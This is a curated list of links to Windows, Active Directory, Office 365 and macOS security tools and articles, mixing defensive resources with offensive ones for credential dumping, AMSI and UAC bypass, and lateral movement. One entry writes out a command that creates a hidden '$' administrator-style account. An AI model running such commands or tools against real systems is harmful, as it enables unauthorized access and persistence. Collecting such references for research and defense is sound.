sysmon-config 4,803 5 months ago : Sysmon configuration file template with default high-quality event tracing
Sysmon: how to set up, update and use?
Panache_Sysmon : Just another sysmon config
Hiding malware in Windows – The basics of code injection
Inveigh 2,555 4 months ago : Windows PowerShell ADIDNS/LLMNR/mDNS/NBNS spoofer/man-in-the-middle tool
Bypassing AppLocker Custom Rules : 0x09AL Security blog
SpecuCheck 569 about 5 years ago : SpecuCheck is a Windows utility for checking the state of the software mitigations against CVE-2017-5754 (Meltdown) and hardware mitigations against CVE-2017-5715 (Spectre)
RID-Hijacking 165 about 2 years ago : Windows RID Hijacking persistence technique
WSL Reloaded
Windows oneliners to download remote payload and execute arbitrary code
reflectivepotato : MSFRottenPotato built as a Reflective DLL. Work in progress
randomrepo 0 10 months ago : Repo for random stuff
Microsoft Windows win32k.sys : Invalid Pointer Vulnerability (MSRC Case 48212) - Security Research
rdpy 1,690 over 3 years ago : Remote Desktop Protocol in Twisted Python
SharpWeb 510 almost 6 years ago : NET 2.0 CLR project to retrieve saved browser credentials from Google Chrome, Mozilla Firefox and Microsoft Internet Explorer/Edge
reconerator 121 almost 4 years ago : C# Targeted Attack Reconnissance Tools
ManbagedInjection 162 over 6 years ago : A proof of concept for dynamically loading .net assemblies at runtime with only a minimal convention pre-knowledge
InveighZero 791 about 2 years ago : C# LLMNR/NBNS spoofer
DanderSpritz Lab 419 over 5 years ago : A fully functional lab in 2 commands
Lateral movement using URL Protocol
HiddenPowerShell 93 about 6 years ago : This project was created to explore the various evasion techniques involving PowerShell: Amsi, ScriptBlockLogging, Constrained Language Mode and AppLocker
One Windows Kernel
The Dog Whisperer’s Handbook : This PDF is a collection of bits and pieces that were scattered across the web and that I collected in the last two years while writing the CypherDog PowerShell module
Attack and Defend microsoft enhanced security administrative environment
raw-socket-snifferr 180 about 6 years ago : Packet capture on Windows without a kernel drive
DCOMrade 254 almost 6 years ago : Powershell script for enumerating vulnerable DCOM Applications
shed 268 almost 6 years ago : .NET runtime inspector
Recovering Plaintext Domain Credentials from WPA2 Enterprise on a Compromised Host
How to steal NTLMv2 hashes using file download vulnerability in web application
NTLMRelay2Self 394 10 months ago : An other No-Fix LPE, NTLMRelay2Self over HTTP (Webdav)
Simpleator 335 almost 6 years ago : ("Simple-ator") is an innovative Windows-centric x64 user-mode application emulator that lever
WinDbg-Samples 722 3 months ago : Sample extensions, scripts, and API uses for WinDbg
OrgKit 597 3 months ago : Provision a brand-new company with proper defaults in Windows, Offic365, and Azure
Leveraging WSUS
windowsblindread 199 over 1 year ago : A list of files / paths to probe when arbitrary files can be read on a Microsoft Windows operating system
azucar 562 about 2 years ago : Security auditing tool for Azure environments
volatility-wnf 15 almost 6 years ago : Browse and dump Windows Notification Facilities
Yet another sdclt UAC bypass : As often with UAC, the flaw comes from an auto-elevated process. These processes have the particularity to run with high integrity level without prompting the local admin with the usual UAC window
awesome-windows-kernel-security-development 1,957 about 2 years ago : windows kernel security development
ALPC-BypassUAC 155 over 5 years ago : UAC Bypass with mmc via alpc
ManagedPasswordFilter 45 over 5 years ago : Windows Password Filter that uses managed code internally
DeviceGuardBypasses 133 over 7 years ago : A repository of some of my Windows 10 Device Guard Bypasses
rifiuti2 143 7 months ago : Windows Recycle Bin analyser
Reversing and Patching .NET Binaries with Embedded References
Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
Windows PowerShell Remoting : Host Based Investigation and Containment Techniques
.NET Manifesto : win friends and influence the loader. . from
Bypassing Windows User Account Control
symboliclink-testing-tools 758 almost 2 years ago : This is a small suite of tools to test various symbolic link types of Windows
Run PowerShell without Powershell.exe — Best tools & techniques
Bypassing the Microsoft-Windows-Threat-Intelligence Kernel APC Injection Sensor
Privileged Access Workstations
Activation Contexts — A Love Story. Windows loads a version of the Microsoft.Windows.SystemCompatible assembly manifest into every process. Tampering with it lets you inject DLL side-loading opportunities into every process, and to perform COM hijacking without touching the registry. Unfortunately, the manifest could be replaced by another version, possibly killing your persistence by surprise
Evil-WinRM 4,537 25 days ago : The ultimate WinRM shell for hacking/pentesting
Understanding WdBoot (Windows Defender ELAM)
SharpHide 465 about 5 years ago : Tool to create hidden registry keys
Microsoft Finally Releases Guidance and a Script to Change the KRBTGT Account
Deploying honeytokens in Active Directory & How to trick attackers with deceptive BloodHound paths
CrackMapExec module to set as "owned" on BloodHound every target owned by the attacker
Configuring Additional LSA Protection
Getting Malicious Office Documents to Fire with Protected View Enable

CSIRT / Operating Systems / Windows / The Internals of AppLocker:

Overview and Setup Part 1:
Blocking Process Creation Part 2:
Access Tokens and Access Checking Part 3:
Blocking DLL Loading Part 4:

CSIRT / Operating Systems / Windows

COM-Code-Helper 178 about 4 years ago : Two IDAPython Scripts help you to reconstruct Microsoft COM (Component Object Model) Code
Scylla 1,116 over 1 year ago : Imports Reconstructor
A Speed-Research on Windows Explorer's Auto-Completion
sysmon-config 4,803 5 months ago : A Sysmon configuration file for everybody to fork
Windows Event Forwarding Guidance 1,228 4 months ago
Build a fast, free, and effective Threat Hunting/Incident Response Console with Windows Event Forwarding and PowerBI
Microsoft Defender Advanced Threat Protection (ATP)
BeaKer 285 about 2 months ago Beaconing Kibana Executable Report: Aggregates Sysmon Network Events With Elasticsearch and Kibana
python-ntlm 90 over 2 years ago : Automatically exported from code.google.com/p/python-ntlm
Logging Made Easy 706 about 1 year ago : is a self-install tutorial for small organisations to gain a basic level of centralised security logging for Windows clients and provide functionality to detect attacks
lme 706 about 1 year ago : Logging Made Easy, is a self-install tutorial for small organisations to gain a basic level of centralised security logging for Windows clients and provide functionality to detect attacks
SharePoint and Pwn :: Remote Code Execution Against SharePoint Server Abusing DataSet
Secure DevOps Kit for Azure 497 almost 3 years ago (AzSK)
Windows Debugger API — The End of Versioned Structures
DisableAntiSpyware
Have you ever wondered what happens behind the scenes when you type your password into the Windows logon screen and hit enter?
DefendTheFlag 234 over 4 years ago : Get started fast with a built out lab, built from scratch via Azure Resource Manager (ARM) and Desired State Configuration (DSC), to test out Microsoft's security products
DumpReparsePoints 31 over 4 years ago : This is a simple tool to dump all the reparse points on an NTFS volume
Certify SSL Manager : manage free https certificates for IIS
Bypassing Credential Guard : Wdigest can be enabled on a system with Credential Guard by patching the values of g_fParameter_useLogonCredential and g_IsCredGuardEnabled in memory
WSUS Attacks Part 1: Introducing PyWSUS
This is about adding a $ account and have it not show up in net users. : net user $ LetMeIn123! /add /active:yes
LECmd 277 5 months ago : Lnk Explorer Command line edition!!
PECmd 223 2 months ago : Prefetch Explorer Command Line
Five PE Analysis Tools Worth Looking At

CSIRT / Operating Systems / Windows / Five PE Analysis Tools Worth Looking At

pestudio : The goal of pestudio is to spot suspicious artifacts within executable files in order to ease and accelerate Malware Initial Assessment and is used by Computer Emergency Response Teams and Labs worldwide
PEview version
FileAlyzer
NTCore Explorer Suite
exeinfo

CSIRT / Operating Systems / Windows

MitigationFlagsCliTool 44 about 4 years ago : Prints mitigation policy information for processes in a dump file
Windows 10 System Programming book samples 408 6 months ago ,
DriverMon 328 about 4 years ago : Monitor activity of any driver
Windows AllTools 1,161 3 months ago : All reasonably stable tools
Sysmon Internals : From File Delete Event to Kernel Code Execution
Windows-driver-samples 6,993 17 days ago : This repo contains driver samples prepared for use with Microsoft Visual Studio and the Windows Driver Kit (WDK). It contains both Universal Windows Driver and desktop-only driver samples
procfilter 397 almost 5 years ago : A YARA-integrated process denial framework for Windows
Winerror 7 about 4 years ago : Get Windows Programming error codes descriptions using the command line
ProcessHacker 11,043 6 days ago : The Minimalistic x86/x64 API Hooking Library for Windows
PVE CA Cert List Utility : Windows 2003/2008 Certificate Authority Certificate List Utility for pending requests and about-to-expire certificates
Release the Kraken: Fileless injection into Windows Error Reporting service
MinHook 4,406 4 months ago : The Minimalistic x86/x64 API Hooking Library for Windows
Windows security baselines
TokenPlayer 267 almost 4 years ago : Manipulating and Abusing Windows Access Tokens
The Poisoned Postman: Detecting Manipulation of Compliance Features in a Microsoft Exchange Online Environment
ntlmscan 346 5 months ago : scan for NTLM directories
Smbtouch-Scanner 140 over 3 years ago : Automatically scan the inner network to detect whether they are vulnerable
Block process creations originating from PSExec and WMI commands
VDM :Vulnerable Driver Manipulation. : A collection of various vulnerable (mostly physical memory exposing) drivers
HppDLL 1 about 4 years ago Source code for : local password dumping using MsvpPasswordValidate hooks
SharpMapExec 653 about 3 years ago : A sharpen version of CrackMapExec. This tool is made to simplify penetration testing of networks and to create a swiss army knife that is made for running on Windows which is often a requirement during insider threat simulation engagements
Fibratus 2,209 7 days ago : A modern tool for the Windows kernel exploration and observability
Ultimate WDAC Bypass List 482 7 months ago : A centralized resource for previously documented WDAC bypass techniques
Live Patching Windows API Calls Using PowerShell
fibratus : A modern tool for the Windows kernel exploration and observability
Adventures in Dynamic Evasion
Windows-Insight 150 over 4 years ago : The content of this repository aims to assist efforts on analysing inner working principles, functionalities, and properties of the Microsoft Windows operating system. This repository stores relevant documentation as well as executable files needed for conducting analysis studies
Fully working SMB protocol implementation in webassembly
Parent Process vs. Creator Process
WINDOWS KERNEL ZERO-DAY EXPLOIT (CVE-2021-1732) IS USED BY BITTER APT IN TARGETED ATTACK
ntvdmx64 819 17 days ago : Run Microsoft Windows NTVDM (DOS) on 64bit Editions
Spectre exploits in the "wild"
RegRipper 557 20 days ago
Security rapid modernization plan
Windows & Active Directory Exploitation Cheat Sheet and Command Reference
Finding writable folders and hijackable DLLs
OffensiveCSharp 1,381 almost 2 years ago : Collection of Offensive C# Tooling
Hyper-V internals researches 661 2 months ago : Internals information about Hyper-V
Do You Really Know About LSA Protection (RunAsPPL)? . : Dump the memory of a PPL with a userland exploit
fibratus 2,209 7 days ago : A modern tool for the Windows kernel exploration and tracing
MSTSC Packet Dump Utility 27 almost 3 years ago : The mstscdump utility allows unencrypted RDP packets being sent or received by MSTSC.EXE (or any other application that loads MSTSCAX.DLL) to be captured into a PCAP file for later analysis in various tools such as Microsoft Message Analyzer, Microsoft Network Monitor, or WireShark. It also demonstrates how to hook into the ActiveX interfaces exposed by MSTSCAX.DLL
How to bypass Defender in a few easy steps
Running NetworkMiner in Windows Sandbox
Windows Desktop 14 almost 4 years ago : History and analysis of Windows desktop images
A collection of tools to interact with Microsoft Security Response Center API 95 11 months ago
GetTempPathW function
No Longer Just Theory: Black Lotus Labs Uncovers Linux Executables Deployed As Stealth Windows Loaders
Human-operated ransomware : Human-operated ransomware is a large and growing attack trend that represents a threat to organizations in every industry
Sharing the first SimuLand dataset to expedite research and learn about adversary tradecraft
Microsoft Security Best Practices
No Longer Just Theory: Black Lotus Labs Uncovers Linux Executables Deployed As Stealth Windows Loaders
Awesome Windows Domain Hardening 1,749 almost 5 years ago : A curated list of awesome Security Hardening techniques for Windows
Event Log Explorer™ for Windows event log analysis
Detecting Forged Kerberos Ticket (Golden Ticket & Silver Ticket) Use in Active Directory
EVERYONE GETS A ROOTKIT : Eclypsium Researchers Identify Weakness in Microsoft WPBT Impacting All Windows-based Devices Since Windows 8
Six Facts about Address Space Layout Randomization on Windows
How to bypass Defender in a few easy steps
whids 1,152 over 1 year ago : Open Source EDR for Windows
Backdoor .NET assemblies with… dnSpy
Windows-auditing-mindmap 1,044 3 months ago : Set of Mindmaps providing a detailed overview of the different #Windows auditing capacities and event log files
If you ever see RDP events, you should parse out the RDP bitmap cache. It maps out bitmap images of a user's RDP session.
Here are a few tool resources for using WinRM w/o PowerShell

CSIRT / Operating Systems / Windows / Here are a few tool resources for using WinRM w/o PowerShell

winrs
Scripting in Windows Remote Management
CSharpWinRM 161 about 4 years ago :.NET 4.0 WinRM API Command Execution
WinRMDLL 140 about 3 years ago : C++ WinRM API via Reflective DLL
WSMan-WinRM 222 over 4 years ago : A collection of proof-of-concept source code and scripts for executing remote commands over WinRM using the WSMan.Automation COM object
pywinrm : is a Python client for the Windows Remote Management (WinRM) service. It allows you to invoke commands on target Windows machines from any machine that can run Python
Abusing Windows Remote Management (WinRM) with Metasploit

CSIRT / Operating Systems / Windows

LACheck 83 about 3 years ago : Multithreaded C# .NET Assembly Local Administrative Privilege Enumeration
awesome_windows_logical_bugs 567 5 months ago : collect for learning cases
Attacking RDP from Inside : How we abused named pipes for smart-card hijacking, unauthorized file system access to client machines and more
Dynamic Invocation in .NET to bypass hooks
LowBox Token Permissive Learning Mode
DInjector : Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL
SMB-Session-Spoofing 118 about 1 year ago : The goal of this program is to create a fake SMB Session
Windows Kernel Introspection (WKI)
MSSQL Analysis Services - Coerced Authentication 124 about 1 year ago : A technique to coerce a Windows SQL Server to authenticate on an arbitrary machine
Reinschauer 506 almost 2 years ago : A PoC to remotely control Windows machines over Websockets
Lsass Shtinkering 377 almost 2 years ago : New method of dumping LSASS by abusing the Windows Error Reporting service. It sends a message to the service with the ALPC protocol to report an exception on LSASS. This report will cause the service to dump the memory of LSASS
Windows Persistence Techniques
Windows XP / Windows Server 2003 VLK key generator 878 12 months ago
Banshee 493 8 months ago : Experimental Windows x64 Kernel Driver/Rootkit
New Variant of DLL Search Order Hijacking Bypasses Windows 10 and 11 Protections
Active Directory Control Paths 654 almost 4 years ago
Gaining Domain Admin from Outside Active Directory , using (LLMNR/NBT-NS/mDNS Poisoner and NTLMv1/2 Relay)
Invoke-ADLabDeployer 479 almost 6 years ago : Automated deployment of Windows and Active Directory test lab networks. Useful for red and blue teams
PowerShellClassLab 41 over 6 years ago : This is a set of Azure Resource Manager Templates that generates an Active Directory lab consisting of a Domain Controller, two Windows servers and a Linux server
ADImporter 69 over 6 years ago
Low Privilege Active Directory Enumeration from a non-Domain Joined Host
Active Directory as a C2
Escalating privileges with ACLs in Active Directory
Active Directory Kill Chain Attack & Defense 4,421 15 days ago : This document was designed to be a useful, informational asset for those looking to understand the specific tactics, techniques, and procedures (TTPs) attackers are leveraging to compromise active directory and guidance to mitigation, detection, and prevention. And understand Active Directory Kill Chain Attack and Modern Post Exploitation Adversary Tradecraft Activity
#TR19 Active Directory Security Track
Penetration Testing Active Directory, Part I : I’ve had several customers come to me before a pentest and say they think they’re in a good shape because their vulnerability scan shows no critical vulnerabilities and that they’re ready for a pentest, which then leads me to getting domain administrator in fifteen minutes by just exploiting misconfigurations in AD
Penetration Testing Active Directory, Part II : For most of this part of the series, I will use the rsmith user credentials, as they are low-level, forcing us to do privilege escalation
Wagging the Dog : Abusing Resource-Based Constrained Delegation to Attack Active Directory
Exploiting PrivExchange : The PrivExchange tool simply logs in on Exchange Web Services to subscribe to push notifications to a specific host

CSIRT / Operating Systems / Windows / BloodHound:

BloodHound 9,893 5 months ago : Six Degrees of Domain Admin, and a based ingestor for BloodHound
BloodHound Database Creator 377 5 months ago : This python script will generate a randomized data set for testing BloodHound features and analysis
Case Study: Password Analysis with BloodHound
Introducing BloodHound 4.0: The Azure Update
SharpHound3 520 over 2 years ago
ATTACK MAPPING WITH BLOODHOUND
aclpwn.py 702 about 3 years ago : Active Directory ACL exploitation with BloodHound
BloodHound.py 1,940 4 months ago : A Python based ingestor for BloodHound
BloodHound-Tools 440 about 2 years ago : Collection of tools that reflect the network dimension into Bloodhound's data

CSIRT / Operating Systems / Windows

Kerberos basics & (ab)use of Certificates within Active Directory (i.e. AD CS and PKINIT) :

CSIRT / Operating Systems / Windows / Kerberos basics & (ab)use of Certificates within Active Directory (i.e. AD CS and PKINIT)

Pass the Certificate
UnPAC the hash
Shadow Credentials
Certificate Services (AD-CS)
Certificate templates
CA configuration
Access controls
Web endpoints

CSIRT / Operating Systems / Windows / Kerberos:

Using Kerberos for Authentication Relay Attacks
Kerberos basics & (ab)use of Certificates within Active Directory (i.e. AD CS and PKINIT)
Kerberos Resource-Based Constrained Delegation : When an Image Change Leads to a Privilege Escalation
New-KrbtgtKeys.ps1 406 9 months ago : This script will enable you to reset the krbtgt account password and related keys while minimizing the likelihood of Kerberos authentication issues being caused by the operation
Kerberos cheatsheet : A cheatsheet with commands that can be used to perform kerberos attacks

CSIRT / Operating Systems / Windows

Bypassing AD account lockout for a compromised account
Azure AD and ADFS best practices : Defending against password spray attacks
NetNTLMtoSilverTicket 763 over 3 years ago : SpoolSample -> Responder w/NetNTLM Downgrade -> NetNTLMv1 -> NTLM -> Kerberos Silver Ticket
Domain Goodness – How I Learned to LOVE AD Explorer
windapsearch 799 over 2 years ago : Python script to enumerate users, groups and computers from a Windows domain through LDAP queries
LDAP Ping and Determining Your Machine’s Site
Non-Admin NTLM Relaying & ETERNALBLUE Exploitation
Active Directory administrative tier model
Exchange-AD-Privesc 728 over 1 year ago : Exchange privilege escalations to Active Directory
Hunting for reconnaissance activities using LDAP search filters
Faking an AD account password change is possible , but detectable.
Building Free Active Directory Lab in Azure Ethical Hacking Lessons —
Configure the log analytics wizard
Reset the krbtgt account password/keys
GetNPUsers & Kerberos Pre-Auth Explained
WinPwn 3,336 10 months ago : Automation for internal Windows Penetrationtest / AD-Security
BadBlood 2,047 over 1 year ago by @davidprowe, Secframe.com, fills a Microsoft Active Directory Domain with a structure and thousands of objects. The output of the tool is a domain similar to a domain in the real world. After BadBlood is ran on a domain, security analysts and engineers can practice using tools to gain an understanding and prescribe to securing Active…
Vulnerable-AD 2,010 7 months ago : Create a vulnerable active directory that's allowing you to test most of the active directory attacks in a local lab
EXTRACTING PASSWORD HASHES FROM THE NTDS.DIT FILE
Active-Directory-Exploitation-Cheat-Sheet 5,669 about 2 months ago : A cheat sheet that contains common enumeration and attack methods for Windows Active Directory
Active Directory Lab Setup Tool . : Active Directory Lab for Penetration Testing
Rubeus 4,135 2 months ago : is a C# toolset for raw Kerberos interaction and abuses
Enabling Active Directory DNS query logging
SharpMapExec 653 about 3 years ago : This tool is made to simplify penetration testing of networks and to create a swiss army knife that is made for running on Windows which is often a requirement during insider threat simulation engagements
Detecting CVE-2020-1472 (CISA ED 20-04) Using Splunk Attack Range
ADTimeline 475 7 days ago : Timeline of Active Directory changes with replication metadata
Still Passing the Hash 15 Years Later
Azure-Sentinel 4,607 7 days ago : Cloud-native SIEM for intelligent security analytics for your entire enterprise
Detecting Abuse of Authentication Mechanisms
Detecting the Elusive: Active Directory Threat Hunting
Exporting AD FS certificates revisited: Tactics, Techniques and Procedures
GPO Abuse: “You can’t see me”
SERVER (UN)TRUST ACCOUNT : Active Directory persistence through userAccountControl manipulation
Active Directory Certificate Services (ADCS - PKI) domain admin vulnerability
DSInternals 1,654 about 2 months ago : Directory Services Internals (DSInternals) PowerShell Module and Framework
Certipy 2,418 3 months ago is a Python tool to enumerate and abuse misconfigurations in Active Directory Certificate Services (AD CS)
Cobalt strike MANUALS_V2 94 about 1 month ago Increasing privileges and collecting information
Active Directory (Attack & Defense )
Your Azure AD Connect server ... it's a Tier 0 asset
Shooting Up: On-Prem to Cloud — Detecting “AADConnect” Creds Dump
AADInternals 1,302 9 days ago : PowerShell module for administering Azure AD and Office 365
From Zero to Domain Admin
Attacking Active Directory: 0 to 0.9
Offensive WMI - Active Directory Enumeration Part , , and
BloodyAD 1,238 18 days ago is an Active Directory Privilege Escalation Framework
SID filter as security boundary between domains? (Part 7) - Trust account attack - from trusting to trusted
KrbRelayUp 1,529 over 2 years ago : a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings)
Harvesting Active Directory credentials via HTTP Request Smuggling
Ping Castle Cloud 145 over 1 year ago : Audit program for AzureAD
Protection of privileged users and groups by Azure AD Restricted Management Administrative Units
Active Directory Kill Chain Attack & Defense 4,421 15 days ago : This document was designed to be a useful, informational asset for those looking to understand the specific tactics, techniques, and procedures (TTPs) attackers are leveraging to compromise active directory and guidance to mitigation, detection, and prevention. And understand Active Directory Kill Chain Attack and Modern Post Exploitation Adversary Tradecraft Activity
A little tool to play with Windows security 19,466 5 months ago
Preventing Mimikatz Attacks – Blue Team – Medium
pypykatz 2,879 about 1 month ago : Mimikatz implementation in pure Python
Walk-through Mimikatz sekurlsa module
Mimikatz: Mitigando ataques de roubo de credenciais (pt-br)
PERFORMING PASS-THE-HASH ATTACKS WITH MIMIKATZ
SharpKatz 974 about 3 years ago : Porting of mimikatz sekurlsa::logonpasswords, sekurlsa::ekeys and lsadump::dcsync commands
Protecting RDP Passwords from Mimikatz Using Remote Credential Guard
Updating Mimikatz in Metasploit
Capturing Credentials with mimikatz
Dumping User Passwords from Windows Memory with Mimikatz
HandleKatz 573 about 2 years ago : PIC lsass dumper using cloned handles
CredentialDumping without Mimikatz
Dumping Lsass Without Mimikatz
PowerShell Gallery
PowerShell Scripts 443 almost 7 years ago : Collection of PowerShell scripts
Example of Malicious DLL Injected in PowerShell
POWERSHELL LOGGING: OBFUSCATION AND SOME NEW(ISH) BYPASSES PART 1
Empire 4,258 10 days ago : Empire is a PowerShell and Python 3.x post-exploitation framework
Invisi-Shell 1,105 over 5 years ago : Hide your Powershell script in plain sight. Bypass all Powershell security features
DevSec Defense How DevOps Practices Can Drive Detection Development For Defenders
Chimera 1,424 about 3 years ago : is a (shiny and very hack-ish) PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions
Geeking out with UEFI, again
PrivescCheck 2,976 11 days ago : Privilege Escalation Enumeration Script for Windows
Stracciatella 503 about 2 years ago : OpSec-safe Powershell runspace from within C# (aka SharpPick) with AMSI, Constrained Language Mode and Script Block Logging disabled at startup
Invoke-PSImage 2,162 about 5 years ago : Embeds a PowerShell script in the pixels of a PNG file and generates a oneliner to execute
Invoke-TheHash 1,480 almost 6 years ago : powerShell Pass The Hash Utils
DeepBlueCLI 2,188 about 1 year ago : DeepBlueCLI - a PowerShell Module for Threat Hunting via Windows Event Logs
PowerShell Security: PowerShell Attack Tools, Mitigation, & Detection
CheeseTools 691 over 3 years ago : Self-developed tools for Lateral Movement/Code Execution
Random 260 3 months ago : a lot of powershell scripts
CredPhish 285 over 3 years ago : is a PowerShell script designed to invoke legitimate credential prompts and exfiltrate passwords over DNS
PowerShell Obfuscation
powercat 2,147 9 months ago : netshell features all in version 2 powershell
PSByPassCLM 375 almost 3 years ago : Bypass for PowerShell Constrained Language Mode
Basic PowerShell for Pentesters
Invoke-CradleCrafter 822 over 6 years ago : PowerShell Remote Download Cradle Generator & Obfuscator
LDAP Monitor 839 5 months ago : Monitor creation, deletion and changes to LDAP objects live during your pentest or system administration!
Understanding and Bypassing AMSI
Exploring PowerShell AMSI and Logging Evasion
AMSI.fail : generates obfuscated PowerShell snippets that break or disable AMSI for the current process
INTRODUCTION TO SANDBOX EVASION AND AMSI BYPASSES
PSBits 3,207 9 days ago : Simple (relatively) things allowing you to dig a bit deeper than usual
Evading Detection: A Beginner's Guide to Obfuscation 1,010 6 months ago
comsvcs MiniDump examples
Beginning PowerShell Empire - Packet Analysis
Detailed properties in the Office 365 audit log
Office 365 Mail Forwarding Rules (and other Mail Rules too)
Application Guard for Office (public preview) for admins 957 4 days ago
o365spray 765 16 days ago : Username enumeration and password spraying tool aimed at Microsoft O365
AdminSubmissionsAPI scripts for URL and mail submission. 10 over 3 years ago Admin Submission API allows submission of URLs, mail messages, file mail messages and files to Microsoft to re-scan and get newest verdict on submitted entity. Admin Submissions API is available both to Exchange Online Protection customers as well as to Office 365 ATP customers
Commentator 49 about 7 years ago : Commentator is a tool written in PowerShell to add a comment to the file properties of a Microsoft Office document (xlsx/m, docx/m, or pptx/m)
Exploiting MFA Inconsistencies on Microsoft Services . : A tool for checking if MFA is enabled on multiple Microsoft Services
msoffcrypto-tool 556 4 months ago : Python tool and library for decrypting MS Office files with passwords or other keys
pyxlsb2 19 over 2 years ago : an Excel 2007+ Binary Workbook (xlsb) parser for Python
Making Clouds Rain :: Remote Code Execution in Microsoft Office 365
The worst of the two worlds: Excel meets Outlook
Go365 621 8 months ago : An Office365 User Attack Tool
Microsoft-365-Defender-Hunting-Queries 1,937 almost 3 years ago : Sample queries for Advanced hunting in Microsoft 365 Defender
m365_groups_enum 52 over 3 years ago : Enumerate Microsoft 365 Groups in a tenant with their metadata
How to hunt for LDAP reconnaissance within M365 Defender?
Stealing tokens, emails, files and more in Microsoft Teams through malicious tabs
Reproducing The ProxyShell Pwn2Own Exploit
ProxyLogon is Just the Tip of the Iceberg : A Surface on Microsoft Exchange Server!
PROXYTOKEN: AN AUTHENTICATION BYPASS IN MICROSOFT EXCHANGE SERVER
How Default Permissions on Microsoft Power Apps Exposed Millions
Excel Recipe: Some VBA Code with a Touch of Excel4 Macro
An XML-Obfuscated Office Document (CVE-2021-40444)
Simple Analysis Of A CVE-2021-40444 .docx Document
cli-microsoft365 926 6 days ago : Manage Microsoft 365 and SharePoint Framework projects on any platform
There’s multiple threat actors using OneDrive in campaigns, straight up just linking OneDrive.
Advanced hunting queries for Microsoft 365 Defender 1,937 almost 3 years ago : Sample queries for Advanced hunting in Microsoft 365 Defender
All Your (d)Base Are Belong To Us, Part 2: Code Execution in Microsoft Office (CVE-2021–38646)
MSSpray 149 almost 2 years ago is used to conduct password spray attacks against Azure AD as well as validate the implementation of MFA on Azure and Office 365 endpoints
Comparison of MOTW (Mark of the Web) propagation support of archiver software for Windows 169 3 months ago
SnaffPoint 239 about 2 years ago : A tool for pointesters to find candies in SharePoint

CSIRT / Operating Systems / macOS/iOS

Apple Open Source and : security mirror
Assembly 559 over 6 years ago An iOS App In
Having fun with macOS 1days 121 over 6 years ago
x18-leak 83 over 6 years ago : iOS 11.2-11.2.6 kernel pointer disclosure introduced by Apple's Meltdown mitigation
EmPyre 867 about 7 years ago : A post-exploitation OS X/Linux agent written in Python 2.7
Apple Lightning (cont.) - serial number reading Kanzi: It's a cable that's used by Apple's own engineers to debug various hardware (mainly iOS-devices, of course) with SWD (Serial Wire Debug - JTAG for ARM cores) - . : Set of tools to interact with various aspects of Kanzi probe and its derivatives
SDQAnalyzer 200 12 months ago : a Saleae analyzer plugin for the SDQ (Apple Lightning, MagSafe, Battery) protocol
Inside Code Signing
jelbrekTime 223 about 6 years ago : An developer jailbreak for Apple watch S3 watchOS 4.1
Disabling MacOS SIP via a VirtualBox kext Vulnerability
mOSL 225 almost 4 years ago : Bash script to audit and fix macOS High Sierra (10.13.x) security settings

CSIRT / Operating Systems / macOS/iOS / Objective-See:

DoNotDisturb 294 almost 4 years ago : Detect Evil Maid Attacks
sniffMK 215 almost 4 years ago : sniff mouse and keyboard events
Remote Mac Exploitation Via Custom URL Schemes
The Mac Malware of 2018

CSIRT / Operating Systems / macOS/iOS

KisMac2 901 about 6 years ago : KisMAC is a free, open source wireless stumbling and security tool for Mac OS X
osx-security-awesome 734 11 months ago : A collection of OSX and iOS security resources
threadexec 80 over 6 years ago : A library to execute code in the context of other processes on iOS 11
Knowledge is Power! Using the macOS/iOS knowledgeC.db Database to Determine Precise User and Application Usage
iOS12 Kernelcache Laundering
kernelcache-laundering 60 about 6 years ago : load iOS12 kernelcaches and PAC code in IDA
Armor 279 about 1 year ago : is a simple Bash script designed to create encrypted macOS payloads capable of evading antivirus scanners
inject_trusts-iOS-v12.1.2-16C104-iPhone11,x.c
opendrop 8,709 5 months ago : An open Apple AirDrop implementation written in Python
A sample of the iOS malware sha256:0d2ee9ade24163613772fdda201af985d852ab506e3d3e7f07fb3fa8b0853560
ipwndfu 7,094 9 months ago : open-source jailbreaking tool for older iOS devices
Pair Locking your iPhone with Configurator 2
KTRW : The journey to build a debuggable iPhone
Privilege Escalation | macOS Malware & The Path to Root Part 2 . : Random scripts for use in the Jamf Pro
Dylib Hijacking MacOS Red Teaming 211:
iOS Application Injection : Having been interested jailbreaking iOS devices for going on almost a decade, mixing security and this makes sense. Within this entry, I document my method of checking if an application can have code injected
The Mac Malware of 2019 👾 : a comprehensive analysis of the year's new malware
OSX.EvilQuest Uncovered
Low-Level Process Hunting on macOS
CVE-2020–9934: Bypassing TCC ...for unauthorized access to sensitive user data!
Attack Secure Boot of SEP windknown@pangu
Compromising the macOS Kernel through Safari by Chaining Six Vulnerabilities 402 over 3 years ago
Sinter : New user-mode security enforcement for macOS
Who put that in my Full Disk Access list? ssh and Mojave’s privacy protection
macOS-Fortress 422 almost 3 years ago : Firewall and Privatizing Proxy for Trackers, Attackers, Malware, Adware, and Spammers with Anti-Virus On-Demand and On-Access Scanning (PF, squid, privoxy, hphosts, dshield, emergingthreats, hostsfile, PAC file, clamav)
From zero to tfp0 - Part 1: Prologue
From zero to tfp0 - Part 2: A Walkthrough of the voucher_swap exploit
We Hacked Apple for 3 Months: Here’s What We Found ,
MACOS INJECTION VIA THIRD-PARTY FRAMEWORKS
NetworkSniffer 122 over 1 year ago : Log iOS network traffic without a proxy
IPv6 security
OpenHaystack 8,572 5 months ago : Build your own 'AirTags' label today! Framework for tracking personal Bluetooth devices via Apple's massive Find My network
All Your Macs Are Belong To Us : bypassing macOS's file quarantine, gatekeeper, and notarization requirements
macOS Security Compliance Project ,
Introducing : macOS Initial Access Payload Generator
Mythic-Macro-Generator 44 over 3 years ago
macOSTools 261 about 1 year ago : macOS Offensive Tools
TrueTree 245 3 months ago : A command line tool for pstree-like output on macOS with additional pid capturing capabilities
Zero-Day TCC bypass discovered in XCSSET malware
Dissecting the Apple M1 GPU, part I and
macos_shell_memory 79 over 3 years ago : Execute MachO binaries in memory using CGo
pwn-my 647 about 3 years ago : iOS 14.5 WebKit/Safari based Jailbreak
M1RACLES : M1ssing Register Access Controls Leak EL0 State. CVE-2021-30747 is a covert channel vulnerability in the Apple Silicon “M1” chip
Vulnerability Spotlight: A deep dive into macOS SMB server
How to Use Kerberos on macOS
Bypassing macOS TCC User Privacy Protections By Accident and Design
Anecdotes About the macOS Sandbox File Limit
SSD Advisory – macOS Finder RCE : Find out how a vulnerability in macOS Finder system allows remote attackers to trick users into running arbitrary commands
How malware gets into the App Store and why Apple can't stop that
Quick Analysis for the SSID Format String Bug
